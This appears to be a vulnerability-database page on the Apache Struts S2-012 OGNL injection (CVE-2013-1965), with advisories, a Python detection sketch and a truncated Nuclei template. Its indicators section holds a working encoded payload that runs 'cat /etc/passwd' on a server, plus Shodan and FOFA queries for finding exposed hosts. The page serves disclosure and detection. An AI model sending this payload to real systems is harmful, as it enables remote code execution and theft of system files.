CVE-2013-1965
Published 2013-07-10
Priority P276 · critical · 9.3 (CVSS 2.0) · AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 93.81% (99.8th percentile)
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | >= 2.0.0 < 2.3.14.1 | 2.3.14.1 |
| apache | struts2-showcase | 2.0.0 – 2.3.13 | — |
Detection & IOCs
url: /user.action
command: name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
- Exploit targets POST requests to /user.action with a crafted OGNL payload in the 'name' parameter using URL-encoded %{...} expression syntax
- Content-Type header is application/x-www-form-urlencoded for the exploit POST request
- Successful exploitation returns HTTP 200 with /etc/passwd content matching root:.*:0:0: in the response body
- Shodan queries to identify exposed Struts2 instances: http.html:"apache struts", http.title:"struts2 showcase", http.html:"struts problem report"
- The second OGNL evaluation occurs when the redirect result reads the injected value from the stack and uses it as a redirect parameter, bypassing Struts and OGNL library protections
- FOFA queries to identify exposed Struts2 instances: body="struts problem report", title="struts2 showcase", body="apache struts"
- The vulnerability is specific to the Struts2 Showcase App (2.0.0–2.3.13); the exploit path /user.action is tied to the Showcase application and may differ in other deployments
- Prior fixes for S2-003, S2-005, and S2-009 only partially closed the OGNL injection vector; this CVE exploits the redirect result evaluation path which those fixes did not address
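
A detection sketch built from the indicators listed above, added here as an example and not taken from the page's sources or from any vendor rule: it decodes form-encoded POST bodies (including repeated URL-encoding), flags OGNL `%{...}` expressions in parameter names or values, and checks a response for the `root:.*:0:0:` pattern. The function names, severity labels and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlencode

OGNL_EXPR = re.compile(r"[%$]\{.+?\}", re.S)   # %{...} or ${...} expression syntax
RISKY_TOKENS = re.compile(r"java\.lang\.|#context|getInputStream|getWriter")
PASSWD_LINE = re.compile(r"root:.*:0:0:")       # response pattern quoted on this page
FORM_CT = "application/x-www-form-urlencoded"

def fully_decode(text, max_rounds=3):
    """Undo repeated URL-encoding so %2525%257B is seen as %{ (bounded loop)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_request(method, path, content_type, body):
    """Return a list of (severity, parameter) findings for one logged request."""
    if method != "POST" or FORM_CT not in content_type.lower():
        return []
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        for part in (fully_decode(key), fully_decode(value)):
            if not OGNL_EXPR.search(part):
                continue
            severity = "high" if RISKY_TOKENS.search(part) else "medium"
            if severity == "high" and path.endswith("/user.action"):
                severity = "critical"   # matches the Showcase path named above
            findings.append((severity, key))
    return findings

def response_confirms_read(status, body):
    """True when the response matches the success indicator (HTTP 200 + passwd line)."""
    return status == 200 and bool(PASSWD_LINE.search(body))

# Constructed sample bodies; the last one is deliberately elided and non-functional.
SAMPLES = [
    "name=alice&age=30",
    "name=%25%7B1%2B1%7D",
    "name=%2525%257B1%252B1%257D",
    urlencode({"name": "%{#a=new java.lang.ProcessBuilder(ELIDED)}"}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_request("POST", "/user.action", FORM_CT, body), body[:40])
```

Because the exploit path may differ outside the Showcase app, the path only raises severity; the expression match alone is enough to produce a finding.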
CVSS provenance
nvd · v2.0 · 9.3 · CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat · 9.3 · CRITICAL
OSV
Improper Control of Generation of Code in Apache Struts
osv·2022-05-14
CVE-2013-1965 [HIGH] Improper Control of Generation of Code in Apache Struts
GHSA
Improper Control of Generation of Code in Apache Struts
ghsa·2022-05-14
CVE-2013-1965 [HIGH] CWE-94 Improper Control of Generation of Code in Apache Struts
Red Hat
struts2: remote command execution in Showcase app
vendor_redhat·2013-05-22·CVSS 9.3
CVE-2013-1965 [CRITICAL] struts2: remote command execution in Showcase app
Statement: A previous statement by Red Hat related to this CVE, prior to August 2019, said that Apache Struts 2 is not included in any Red Hat products. This earlier statement was incorrect. While Struts 2 is not actively compiled, shipped, used, or enabled in any Red Hat provided final products, and does not cause any vulnerability in the product, struts2-core jars have been included in some products' source code packages. The inclusion was part of an import of the Google Guice repository, which includes struts2-core
No detection rules found.
Nuclei
Apache Struts2 S2-012 RCE
nuclei·CVSS 9.3
CVE-2013-1965 [CRITICAL] Apache Struts2 S2-012 RCE
Template:
```yaml
id: CVE-2013-1965

info:
  name: Apache Struts2 S2-012 RCE
  author: pikpikcu
  severity: critical
  description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution on the affected server.
  remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
  reference:
```